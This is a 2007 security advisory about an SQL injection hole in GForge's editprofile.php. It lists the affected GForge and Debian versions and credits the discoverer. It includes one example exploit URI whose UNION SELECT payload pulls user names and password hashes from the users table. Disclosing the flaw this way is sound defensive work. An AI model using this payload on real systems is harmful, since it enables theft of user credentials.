

Title GForge Topic EditProfile.PHP SQL Injection Vulnerability
Published 2007-09-14-12:00AM
Updated 2007-09-14-06:20PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  Summit Siddharth of Portcullis Computer Security is credited with the discovery of this vulnerability.
Vulnerable  GForge GForge 4.5.14
Debian Linux 4.0 sparc
Debian Linux 4.0 s/390
Debian Linux 4.0 powerpc
Debian Linux 4.0 mipsel
Debian Linux 4.0 mips
Debian Linux 4.0 m68k
Debian Linux 4.0 ia64
Debian Linux 4.0 ia32
Debian Linux 4.0 hppa
Debian Linux 4.0 arm
Debian Linux 4.0 amd64
Debian Linux 4.0 alpha
Debian Linux 4.0
GForge GForge 4.5.11
GForge GForge 4.5
GForge GForge 4.0.2
GForge GForge 4.0.1
GForge GForge 4.0
GForge GForge 3.21
GForge GForge 3.3
GForge GForge 3.2
GForge GForge 3.1
Debian Linux 3.1 sparc
Debian Linux 3.1 s/390
Debian Linux 3.1 ppc
Debian Linux 3.1 mipsel
Debian Linux 3.1 mips
Debian Linux 3.1 m68k
Debian Linux 3.1 ia64
Debian Linux 3.1 ia32
Debian Linux 3.1 hppa
Debian Linux 3.1 arm
Debian Linux 3.1 amd64
Debian Linux 3.1 alpha
Debian Linux 3.1
Not Vulnerable  
Code  Attackers can use a browser to exploit this issue. The following example URI is available:
http://www.example.com/www/people/editprofile.php?skill_delete%5B%5D=484)+UNION+ALL+SELECT+user_name||unix_pw+from+users--%3d1&MultiDelete=Delete



Copyright 2007, SecurityDot
Fri, 18 Dec 2009 07:41:05 +0000
